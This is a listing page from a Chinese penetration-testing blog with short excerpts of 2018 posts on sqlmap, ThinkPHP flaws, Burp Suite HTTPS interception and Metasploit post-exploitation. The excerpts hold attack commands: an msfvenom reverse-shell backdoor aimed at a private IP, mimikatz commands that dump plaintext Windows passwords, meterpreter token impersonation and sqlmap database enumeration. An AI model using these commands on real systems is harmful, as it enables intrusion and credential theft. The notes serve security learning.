上一页 1 2 3 4 5 6 ··· 12 下一页
2018年6月2日
sqlmap参数
摘要: sqlmap -u “http://url/news?id=1〃 –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1〃 –current-db #获取当前数 据库名称sqlmap -u “http://www.xxoo.co 阅读全文
posted @ 2018-06-02 11:54 ihoneysec 阅读(565) 评论(0) 推荐(0) 编辑
2018年5月30日
五月份文章收藏
摘要: 最后更新:2018年06月02日11:49:30 代码审计: 一次thinkphp挖矿cms的失败代码审计 [【转载】] ThinkPHP5 SQL注入漏洞 ThinkPHP 5.0.10-3.2.3 缓存函数设计缺陷可导致 Getshell (评论区也有干货) ThinkPHP框架 5.0.x s 阅读全文
posted @ 2018-05-30 11:09 ihoneysec 阅读(375) 评论(0) 推荐(0) 编辑
2018年4月28日
ms16-032
该文被密码保护。 阅读全文
posted @ 2018-04-28 17:33 ihoneysec 阅读(0) 评论(0) 推荐(0) 编辑
2018年4月22日
模拟器配置Burpsuite抓取https包
摘要: 在模拟器中设置代理,长按WiredSSID会弹出菜单: 点击修改网络: 显示高级选项打勾,然后设置代理ip,也就是你运行burp的机器ip: 然后导出burp的证书: 设置保存的路径和文件名: 模拟器左边栏点击设置共享: 模拟器内会自动打开这个目录: 然后单击这个证书文件,设置证书名字: 会提示已安 阅读全文
posted @ 2018-04-22 00:38 ihoneysec 阅读(880) 评论(0) 推荐(0) 编辑
2018年4月14日
祈福
该文被密码保护。 阅读全文
posted @ 2018-04-14 01:42 ihoneysec 阅读(0) 评论(0) 推荐(0) 编辑
msf提权基础(一)
摘要: 令牌(token)相当于系统的临时密钥(账号及密码) 加载incognito模块 meterpreter> use incognito meterpreter > list_tokens -u //列出可用令牌 meterpreter > impersonate_token WIN-xxxxxxxx 阅读全文
posted @ 2018-04-14 00:05 ihoneysec 阅读(1809) 评论(0) 推荐(0) 编辑
2018年4月13日
msf常用命令
摘要: 获取 Windows 明文用户名密码 git clone https://github.com/gentilkiwi/mimikatz.git load mimikatz privilege::debug sekurlsa::logonPasswords full Python shell pyth 阅读全文
posted @ 2018-04-13 23:48 ihoneysec 阅读(3923) 评论(0) 推荐(0) 编辑
msf后渗透
摘要: 生成exe后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.131 lport=4444 -f exe -o 4444.ex 传到测试机执行后得到反弹shell msfconsole msf > use multi/han 阅读全文
posted @ 2018-04-13 23:47 ihoneysec 阅读(749) 评论(0) 推荐(0) 编辑
2018年3月31日
Python多线程队列
该文被密码保护。 阅读全文
posted @ 2018-03-31 18:01 ihoneysec 阅读(0) 评论(0) 推荐(0) 编辑
2018年3月25日
mysql
摘要: cat <<EOF ************************************* * 即 将 进 行 的 操 作 * * 4. mysql -- mysql 安装 * ************************************* EOF cd /rootwget http 阅读全文
posted @ 2018-03-25 20:53 ihoneysec 阅读(149) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 ··· 12 下一页